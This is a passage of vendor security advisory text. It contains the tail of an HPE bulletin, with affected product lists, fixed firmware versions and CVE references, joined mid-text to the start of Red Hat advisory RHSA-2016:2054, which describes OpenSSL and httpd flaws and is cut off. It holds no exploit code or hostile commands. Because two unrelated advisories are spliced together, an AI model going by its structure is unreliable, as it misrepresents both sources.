3600-24 v2 SI Switch\n      - JG304B HP 3600-24 v2 SI Switch\n      - JG305A HP 3600-48 v2 SI Switch\n      - JG305B HP 3600-48 v2 SI Switch\n      - JG306A HP 3600-24-PoE+ v2 SI Switch\n      - JG306B HP 3600-24-PoE+ v2 SI Switch\n      - JG306C HP 3600-24-PoE+ v2 SI Switch\n      - JG307A HP 3600-48-PoE+ v2 SI Switch\n      - JG307B HP 3600-48-PoE+ v2 SI Switch\n      - JG307C HP 3600-48-PoE+ v2 SI Switch\n  + **3100V2 (Comware 5) - Version: R5213P01**\n    * HP Network Products\n      - JD313B HPE 3100 24 PoE v2 EI Switch\n      - JD318B HPE 3100 8 v2 EI Switch\n      - JD319B HPE 3100 16 v2 EI Switch\n      - JD320B HPE 3100 24 v2 EI Switch\n      - JG221A HPE 3100 8 v2 SI Switch\n      - JG222A HPE 3100 16 v2 SI Switch\n      - JG223A HPE 3100 24 v2 SI Switch\n  + **HP870 (Comware 5) - Version: R2607P51**\n    * HP Network Products\n      - JG723A HP 870 Unified Wired-WLAN Appliance\n      - JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance\n  + **HP850 (Comware 5) - Version: R2607P51**\n    * HP Network Products\n      - JG722A HP 850 Unified Wired-WLAN Appliance\n      - JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance\n  + **HP830 (Comware 5) - Version: R3507P51**\n    * HP Network Products\n      - JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch\n      - JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch\n      - JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch\n      - JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant\n  + **HP6000 (Comware 5) - Version: R2507P44**\n    * HP Network Products\n      - JG639A HP 10500/7500 20G Unified Wired-WLAN Module\n      - JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module\n  + **WX5004-EI (Comware 5) - Version: R2507P44**\n    * HP Network Products\n      - JD447B HP WX5002 Access Controller\n      - JD448A HP WX5004 Access Controller\n      - JD448B HP WX5004 Access Controller\n      - JD469A HP WX5004 Access Controller\n  + **SecBlade FW (Comware 5) - Version: R3181P07**\n    * HP Network Products\n      - JC635A HP 12500 VPN Firewall Module\n      - JD245A HP 9500 VPN Firewall Module\n      - JD249A HP 10500/7500 Advanced VPN Firewall Module\n      - JD250A HP 6600 Firewall Processing Router Module\n      - JD251A HP 8800 Firewall Processing Module\n      - JD255A HP 5820 VPN Firewall Module\n  + **F1000-E (Comware 5) - Version: TBD still fixing**\n    * HP Network Products\n      - JD272A HP F1000-E VPN Firewall Appliance\n  + **F1000-A-EI (Comware 5) - Version: TBD still fixing**\n    * HP Network Products\n      - JG214A HP F1000-A-EI VPN Firewall Appliance\n  + **F1000-S-EI (Comware 5) - Version: TBD still fixing**\n    * HP Network Products\n      - JG213A HP F1000-S-EI VPN Firewall Appliance\n  + **F5000-A (Comware 5) - Version: F3210P26**\n    * HP Network Products\n      - JD259A HP A5000-A5 VPN Firewall Chassis\n      - JG215A HP F5000 Firewall Main Processing Unit\n      - JG216A HP F5000 Firewall Standalone Chassis\n  + **U200S and CS (Comware 5) - Version: F5123P33**\n    * HP Network Products\n      - JD273A HP U200-S UTM Appliance\n  + **U200A and M (Comware 5) - Version: F5123P33**\n    * HP Network Products\n      - JD275A HP U200-A UTM Appliance\n  + **F5000-C/S (Comware 5) - Version: TBD still fixing**\n    * HP Network Products\n      - JG650A HP F5000-C VPN Firewall Appliance\n      - JG370A HP F5000-S VPN Firewall Appliance\n  + **SecBlade III (Comware 5) - Version: TBD still fixing**\n    * HP Network Products\n      - JG371A HP 12500 20Gbps VPN Firewall Module\n      - JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module\n  + **6600 RSE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n    * HP Network Products\n      - JC177A HP 6608 Router\n      - JC177B HP 6608 Router Chassis\n      - JC178A HP 6604 Router Chassis\n      - JC178B HP 6604 Router Chassis\n      - JC496A HP 6616 Router Chassis\n      - JC566A HP 6600 RSE-X1 Router Main Processing Unit\n      - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit\n  + **6600 RPE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n    * HP Network Products\n      - JC165A HP 6600 RPE-X1 Router Module\n      - JC177A HP 6608 Router\n      - JC177B HPE FlexNetwork 6608 Router Chassis\n      - JC178A HPE FlexNetwork 6604 Router Chassis\n      - JC178B HPE FlexNetwork 6604 Router Chassis\n      - JC496A HPE FlexNetwork 6616 Router Chassis\n      - JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit\n  + **6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n    * HP Network Products\n      - JC176A HP 6602 Router Chassis\n  + **HSR6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n    * HP Network Products\n      - JC177A HP 6608 Router\n      - JC177B HP 6608 Router Chassis\n      - JC178A HP 6604 Router Chassis\n      - JC178B HP 6604 Router Chassis\n      - JC496A HP 6616 Router Chassis\n      - JG353A HP HSR6602-G Router\n      - JG354A HP HSR6602-XG Router\n      - JG355A HP 6600 MCP-X1 Router Main Processing Unit\n      - JG356A HP 6600 MCP-X2 Router Main Processing Unit\n      - JG776A HP HSR6602-G TAA-compliant Router\n      - JG777A HP HSR6602-XG TAA-compliant Router\n      - JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit\n  + **HSR6800 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n    * HP Network Products\n      - JG361A HP HSR6802 Router Chassis\n      - JG361B HP HSR6802 Router Chassis\n      - JG362A HP HSR6804 Router Chassis\n      - JG362B HP HSR6804 Router Chassis\n      - JG363A HP HSR6808 Router Chassis\n      - JG363B HP HSR6808 Router Chassis\n      - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n      - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n  + **SMB1910 (Comware 5) - Version: R1113**\n    * HP Network Products\n      - JG540A HP 1910-48 Switch\n      - JG539A HP 1910-24-PoE+ Switch\n      - JG538A HP 1910-24 Switch\n      - JG537A HP 1910-8 -PoE+ Switch\n      - JG536A HP 1910-8 Switch\n  + **SMB1920 (Comware 5) - Version: R1112**\n    * HP Network Products\n      - JG928A HP 1920-48G-PoE+ (370W) Switch\n      - JG927A HP 1920-48G Switch\n      - JG926A HP 1920-24G-PoE+ (370W) Switch\n      - JG925A HP 1920-24G-PoE+ (180W) Switch\n      - JG924A HP 1920-24G Switch\n      - JG923A HP 1920-16G Switch\n      - JG922A HP 1920-8G-PoE+ (180W) Switch\n      - JG921A HP 1920-8G-PoE+ (65W) Switch\n      - JG920A HP 1920-8G Switch\n  + **V1910 (Comware 5) - Version: R1517P01**\n    * HP Network Products\n      - JE005A HP 1910-16G Switch\n      - JE006A HP 1910-24G Switch\n      - JE007A HP 1910-24G-PoE (365W) Switch\n      - JE008A HP 1910-24G-PoE(170W) Switch\n      - JE009A HP 1910-48G Switch\n      - JG348A HP 1910-8G Switch\n      - JG349A HP 1910-8G-PoE+ (65W) Switch\n      - JG350A HP 1910-8G-PoE+ (180W) Switch\n  + **SMB 1620 (Comware 5) - Version: R1110**\n    * HP Network Products\n      - JG914A HP 1620-48G Switch\n      - JG913A HP 1620-24G Switch\n      - JG912A HP 1620-8G Switch\n  + **NJ5000 - Version: R1107**\n    * HP Network Products\n      - JH237A HPE FlexNetwork NJ5000 5G PoE+ Walljack\n\n\n**COMWARE 7 Products**\n\n  + **12500 (Comware 7) - Version: R7377**\n    * HP Network Products\n      - JC072B HP 12500 Main Processing Unit\n      - JC085A HP A12518 Switch Chassis\n      - JC086A HP A12508 Switch Chassis\n      - JC652A HP 12508 DC Switch Chassis\n      - JC653A HP 12518 DC Switch Chassis\n      - JC654A HP 12504 AC Switch Chassis\n      - JC655A HP 12504 DC Switch Chassis\n      - JF430A HP A12518 Switch Chassis\n      - JF430B HP 12518 Switch Chassis\n      - JF430C HP 12518 AC Switch Chassis\n      - JF431A HP A12508 Switch Chassis\n      - JF431B HP 12508 Switch Chassis\n      - JF431C HP 12508 AC Switch Chassis\n      - JG497A HP 12500 MPU w/Comware V7 OS\n      - JG782A HP FF 12508E AC Switch Chassis\n      - JG783A HP FF 12508E DC Switch Chassis\n      - JG784A HP FF 12518E AC Switch Chassis\n      - JG785A HP FF 12518E DC Switch Chassis\n      - JG802A HP FF 12500E MPU\n  + **10500 (Comware 7) - Version: R7180**\n    * HP Network Products\n      - JC611A HP 10508-V Switch Chassis\n      - JC612A HP 10508 Switch Chassis\n      - JC613A HP 10504 Switch Chassis\n      - JC748A HP 10512 Switch Chassis\n      - JG608A HP FlexFabric 11908-V Switch Chassis\n      - JG609A HP FlexFabric 11900 Main Processing Unit\n      - JG820A HP 10504 TAA Switch Chassis\n      - JG821A HP 10508 TAA Switch Chassis\n      - JG822A HP 10508-V TAA Switch Chassis\n      - JG823A HP 10512 TAA Switch Chassis\n      - JG496A HP 10500 Type A MPU w/Comware v7 OS\n      - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n      - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n  + **12900 (Comware 7) - Version: R1150**\n    * HP Network Products\n      - JG619A HP FlexFabric 12910 Switch AC Chassis\n      - JG621A HP FlexFabric 12910 Main Processing Unit\n      - JG632A HP FlexFabric 12916 Switch AC Chassis\n      - JG634A HP FlexFabric 12916 Main Processing Unit\n      - JH104A HP FlexFabric 12900E Main Processing Unit\n      - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n      - JH263A HP FlexFabric 12904E Main Processing Unit\n      - JH255A HP FlexFabric 12908E Switch Chassis\n      - JH262A HP FlexFabric 12904E Switch Chassis\n      - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n      - JH103A HP FlexFabric 12916E Switch Chassis\n  + **5900 (Comware 7) - Version: R2432P01**\n    * HP Network Products\n      - JC772A HP 5900AF-48XG-4QSFP+ Switch\n      - JG296A HP 5920AF-24XG Switch\n      - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n      - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n      - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n      - JG555A HP 5920AF-24XG TAA Switch\n      - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n      - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n      - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n      - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n  + **MSR1000 (Comware 7) - Version: R0306P12**\n    * HP Network Products\n      - JG875A HP MSR1002-4 AC Router\n      - JH060A HP MSR1003-8S AC Router\n  + **MSR2000 (Comware 7) - Version: R0306P12**\n    * HP Network Products\n      - JG411A HP MSR2003 AC Router\n      - JG734A HP MSR2004-24 AC Router\n      - JG735A HP MSR2004-48 Router\n      - JG866A HP MSR2003 TAA-compliant AC Router\n  + **MSR3000 (Comware 7) - Version: R0306P12**\n    * HP Network Products\n      - JG404A HP MSR3064 Router\n      - JG405A HP MSR3044 Router\n      - JG406A HP MSR3024 AC Router\n      - JG407A HP MSR3024 DC Router\n      - JG408A HP MSR3024 PoE Router\n      - JG409A HP MSR3012 AC Router\n      - JG410A HP MSR3012 DC Router\n      - JG861A HP MSR3024 TAA-compliant AC Router\n  + **MSR4000 (Comware 7) - Version: R0306P12**\n    * HP Network Products\n      - JG402A HP MSR4080 Router Chassis\n      - JG403A HP MSR4060 Router Chassis\n      - JG412A HP MSR4000 MPU-100 Main Processing Unit\n      - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n  + **VSR (Comware 7) - Version: E0322P01**\n    * HP Network Products\n      - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n      - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n      - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n      - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n  + **7900 (Comware 7) - Version: R2150**\n    * HP Network Products\n      - JG682A HP FlexFabric 7904 Switch Chassis\n      - JG841A HP FlexFabric 7910 Switch Chassis\n      - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n      - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n      - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n      - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n      - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n      - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n  + **5130 (Comware 7) - Version: R3113P02**\n    * HP Network Products\n      - JG932A HP 5130-24G-4SFP+ EI Switch\n      - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n      - JG934A HP 5130-48G-4SFP+ EI Switch\n      - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n      - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n      - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n      - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n      - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n      - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n      - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n      - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n      - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n      - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n  + **6125XLG - Version: R2432P01**\n    * HP Network Products\n      - 711307-B21 HP 6125XLG Blade Switch\n      - 737230-B21 HP 6125XLG Blade Switch with TAA\n  + **6127XLG - Version: R2432P01**\n    * HP Network Products\n      - 787635-B21 HP 6127XLG Blade Switch Opt Kit\n      - 787635-B22 HP 6127XLG Blade Switch with TAA\n  + **Moonshot - Version: R2432P01**\n    * HP Network Products\n      - 786617-B21 - HP Moonshot-45Gc Switch Module\n      - 704654-B21 - HP Moonshot-45XGc Switch Module\n      - 786619-B21 - HP Moonshot-180XGc Switch Module\n  + **5700 (Comware 7) - Version: R2432P01**\n    * HP Network Products\n      - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n      - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n      - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n      - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n      - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n      - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n  + **5930 (Comware 7) - Version: R2432P01**\n    * HP Network Products\n      - JG726A HP FlexFabric 5930 32QSFP+ Switch\n      - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n      - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n      - JH179A HP FlexFabric 5930 4-slot Switch\n      - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n      - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n  + **HSR6600 (Comware 7) - Version: R7103P09**\n    * HP Network Products\n      - JG353A HP HSR6602-G Router\n      - JG354A HP HSR6602-XG Router\n      - JG776A HP HSR6602-G TAA-compliant Router\n      - JG777A HP HSR6602-XG TAA-compliant Router\n  + **HSR6800 (Comware 7) - Version: R7103P09**\n    * HP Network Products\n      - JG361A HP HSR6802 Router Chassis\n      - JG361B HP HSR6802 Router Chassis\n      - JG362A HP HSR6804 Router Chassis\n      - JG362B HP HSR6804 Router Chassis\n      - JG363A HP HSR6808 Router Chassis\n      - JG363B HP HSR6808 Router Chassis\n      - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n      - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing\n      - JH075A HP HSR6800 RSE-X3 Router Main Processing Unit\n  + **1950 (Comware 7) - Version: R3113P02**\n    * HP Network Products\n      - JG960A HP 1950-24G-4XG Switch\n      - JG961A HP 1950-48G-2SFP+-2XGT Switch\n      - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n      - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n  + **7500 (Comware 7) - Version: R7180**\n    * HP Network Products\n      - JD238C HP 7510 Switch Chassis\n      - JD239C HP 7506 Switch Chassis\n      - JD240C HP 7503 Switch Chassis\n      - JD242C HP 7502 Switch Chassis\n      - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n      - JH208A HP 7502 Main Processing Unit\n      - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n  + **5510HI (Comware 7) - Version: R1120**\n    * HP Network Products\n      - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n      - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n      - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n      - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n      - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n  + **5130HI (Comware 7) - Version: R1120**\n    * HP Network Products\n      - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n      - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n      - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n      - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n\n\n**iMC Products**\n\n  + **IMC PLAT - Version: 7.2 E0403P04**\n    * HP Network Products\n      - JD125A  HP IMC Std S/W Platform w/100-node\n      - JD126A  HP IMC Ent S/W Platform w/100-node\n      - JD808A  HP IMC Ent Platform w/100-node License\n      - JD814A   HP A-IMC Enterprise Edition Software DVD Media\n      - JD815A  HP IMC Std Platform w/100-node License\n      - JD816A  HP A-IMC Standard Edition Software DVD Media\n      - JF288AAE  HP Network Director to Intelligent Management Center\nUpgrade E-LTU\n      - JF289AAE  HP Enterprise Management System to Intelligent Management\nCenter Upgrade E-LTU\n      - JF377A  HP IMC Std S/W Platform w/100-node Lic\n      - JF377AAE  HP IMC Std S/W Pltfrm w/100-node E-LTU\n      - JF378A  HP IMC Ent S/W Platform w/200-node Lic\n      - JF378AAE  HP IMC Ent S/W Pltfrm w/200-node E-LTU\n      - JG546AAE  HP IMC Basic SW Platform w/50-node E-LTU\n      - JG548AAE  HP PCM+ to IMC Bsc Upgr w/50-node E-LTU\n      - JG549AAE  HP PCM+ to IMC Std Upgr w/200-node E-LTU\n      - JG747AAE  HP IMC Std SW Plat w/ 50 Nodes E-LTU\n      - JG748AAE  HP IMC Ent SW Plat w/ 50 Nodes E-LTU\n      - JG768AAE  HP PCM+ to IMC Std Upg w/ 200-node E-LTU\n  + **IMC iNode - Version: 7.2 E0407**\n    * HP Network Products\n      - JD144A HP A-IMC User Access Management Software Module with 200-user\nLicense\n      - JD147A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n      - JD435A HP A-IMC Endpoint Admission Defense Client Software\n      - JF388A HP IMC User Authentication Management Software Module with\n200-user License\n      - JF388AAE HP IMC User Authentication Management Software Module with\n200-user E-LTU\n      - JF391A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n      - JF391AAE HP IMC Endpoint Admission Defense Software Module with\n200-user E-LTU\n      - JG752AAE HP IMC User Access Manager Software Module with 50-user\nE-LTU\n      - JG754AAE) HP IMC Endpoint Admission Defense Software Module with\n50-user E-LTU\n  + **iMC UAM_TAM - Version: 7.1 E0406**\n    * HP Network Products\n      - JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE\n      - JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU\n      - JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU\n      - JG483A HP IMC TAM S/W MODULE W/100-NODE LIC\n      - JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU\n      - JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU\n  + **IMC WSM - Version: 7.2 E0502P04**\n    * HP Network Products\n      - JD456A HP IMC WSM Software Module with 50-Access Point License\n      - JF414A HP IMC Wireless Service Manager Software Module with 50-Access\nPoint License\n      - JF414AAE HP IMC Wireless Service Manager Software Module with\n50-Access Point E-LTU\n      - JG551AAE HP PCM+ Mobility Manager to IMC Wireless Service Manager\nModule Upgrade with 250 Access Point E-LTU\n      - JG758AAE HP IMC WSM/RTLS w/ 50-node E-LTU\n      - JG769AAE HP PCM Mobility Manager to IMC Wireless Service Manager Upg\nwith 250-node E-LTU\n\n**VCX Products**\n\n  + **VCX - Version: 9.8.19**\n    * HP Network Products\n      - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n      - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n      - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n      -  JE355A HP VCX V6000 Branch Platform 9.0\n      - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n      - JC518A HP VCX Connect 200 Primry 120 G6 Server\n      - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n      - JE341A HP VCX Connect 100 Secondary\n      - JE252A HP VCX Connect Primary MIM Module\n      - JE253A HP VCX Connect Secondary MIM Module\n      - JE254A HP VCX Branch MIM Module\n      - JE355A HP VCX V6000 Branch Platform 9.0\n      - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n      - JD023A HP MSR30-40 Router with VCX MIM Module\n      - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n      - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n      - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n      - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n      - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n      - JE340A HP VCX Connect 100 Pri Server 9.0\n      - JE342A HP VCX Connect 100 Sec Server 9.0\n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 21 February 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n  Web form: https://www.hpe.com/info/report-security-vulnerability\n  Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\nReferences:\n\nCVE-2007-6750\nCVE-2011-4969\nCVE-2014-3508\nCVE-2014-3509\nCVE-2014-3511\nCVE-2014-3513\nCVE-2014-3569\nCVE-2014-3568\nCVE-2014-3567\nCVE-2015-1788\nCVE-2015-1789\nCVE-2015-1790\nCVE-2015-1791\nCVE-2015-1792\nCVE-2015-0205\nCVE-2015-3194\nCVE-2015-3195\nCVE-2015-3237\nCVE-2015-6565\nCVE-2015-7501\nCVE-2015-7547\nCVE-2015-7995\nCVE-2015-8035\nCVE-2016-0705\nCVE-2016-0728\nCVE-2016-0799\nCVE-2016-2015\nCVE-2016-2017\nCVE-2016-2018\nCVE-2016-2019\nCVE-2016-2020\nCVE-2016-2021\nCVE-2016-2022\nCVE-2016-2024\nCVE-2016-2030\nCVE-2016-2842\nPSRT110092\nPSRT110093\nPSRT110094\nPSRT110095\nPSRT110096\nPSRT110138\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: Red Hat JBoss Enterprise Application Platform 6.4.10 natives update on RHEL 7\nAdvisory ID:       RHSA-2016:2054-01\nProduct:           Red Hat JBoss Enterprise Application Platform\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2016-2054.html\nIssue date:        2016-10-12\nCVE Names:         CVE-2015-3183 CVE-2015-3195 CVE-2015-4000 \n                   CVE-2016-2105 CVE-2016-2106 CVE-2016-2108 \n                   CVE-2016-2109 CVE-2016-3110 CVE-2016-4459 \n=====================================================================\n\n1. Summary:\n\nUpdated packages that provide Red Hat JBoss Enterprise Application Platform\n6.4.10 natives, fix several bugs, and add various enhancements are now\navailable for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss Enterprise Application Platform 6.4 for RHEL 7 Server - noarch, ppc64, x86_64\n\n3. Description:\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7. \n\nThis release includes bug fixes and enhancements, as well as a new release\nof OpenSSL that addresses a number of outstanding security flaws. For\nfurther information, see the knowledge base article linked to in the\nReferences section. All users of Red Hat JBoss Enterprise Application\nPlatform 6.4 on Red Hat Enterprise Linux 7 are advised to upgrade to these\nupdated packages. The JBoss server process must be restarted for the update\nto take effect. \n\nSecurity Fix(es):\n\n* A flaw was found in the way OpenSSL encoded certain ASN.1 data\nstructures. An attacker could use this flaw to create a specially crafted\ncertificate which, when verified or re-encoded by OpenSSL, could cause it\nto crash, or execute arbitrary code using the permissions of the user\nrunning an application compiled against the OpenSSL library. \n(CVE-2016-2108)\n\n* Multiple flaws were found in the way httpd parsed HTTP requests and\nresponses using chunked transfer encoding. A remote attacker could use\nthese flaws to create a specially crafted request, which httpd would decode\ndifferently from an HTTP proxy software in front of it, possibly leading to\nHTTP request smuggling attacks. (CVE-2015-3183)\n\n* A memory leak vulnerability was found in the way OpenSSL parsed PKCS#7\nand CMS data. (CVE-2015-3195)\n\n* A flaw was found in the way the TLS protocol composes the Diffie-Hellman\nexchange (for both export and non-export grade cipher suites). An attacker\ncould use this flaw to downgrade a DHE connection to use export-grade key\nsizes, which could then be broken by sufficient pre-computation. This can\nlead to a passive man-in-the-middle attack in which the attacker is able to\ndecrypt all traffic. (CVE-2015-4000)\n\n* An integer overflow flaw, leading to a buffer overflow, was found in the\nway the EVP_EncodeUpdate() function of OpenSSL parsed very large amounts of\ninput data. A remote attacker could use this flaw to crash an application\nusing OpenSSL or, possibly, execute arbitrary code with the permissions of\nthe user running that application. (CVE-2016-2105)\n\n* An integer overflow flaw, leading to a buffer overflow, was found in the\nway the EVP_EncryptUpdate() function of OpenSSL parsed very large amounts\nof input data. A remote attacker could use this flaw to crash an\napplication using OpenSSL or, possibly, execute arbitrary code with the\npermissions of the user running that application. (CVE-2016-2106)\n\n* It was discovered that it is possible to remotely Segfault Apache http\nserver with a specially crafted string sent to the mod_cluster via service\nmessages (MCMP). (CVE-2016-3110)\n\n* A denial of service flaw was found in the way OpenSSL parsed certain\nASN.1-encoded data from BIO (OpenSSL\u0027s I/O abstraction) inputs. An\napplication using OpenSSL that accepts untrusted ASN.1 BIO input could be\nforced to allocate an excessive amount of data. (CVE-2016-2109)\n\n* It was discovered that specifying configuration with a JVMRoute path\nlonger than 80 characters will cause segmentation fault leading to a server\ncrash. (CVE-2016-4459)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2016-2108, CVE-2016-2105, and CVE-2016-2106 and Michal Karm Babacek for\nreporting CVE-2016-3110. The CVE-2016-4459 issue was discovered by Robert\nBost (Red Hat). Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno\nBAPck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; and Guido Vranken as the original reporter of CVE-2016-2105\nand CVE-2016-2106. \n\n4. Solution:\n\nBefore applying this update, back up your existing Red Hat JBoss Enterprise\nApplication Platform installation and deployed applications. \n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1223211 - CVE-2015-4000 LOGJAM: TLS connections which support export grade DHE key-exchange are vulnerable to MITM attacks\n1243887 - CVE-2015-3183 httpd: HTTP request smuggling attack against chunked request parser\n1288322 - 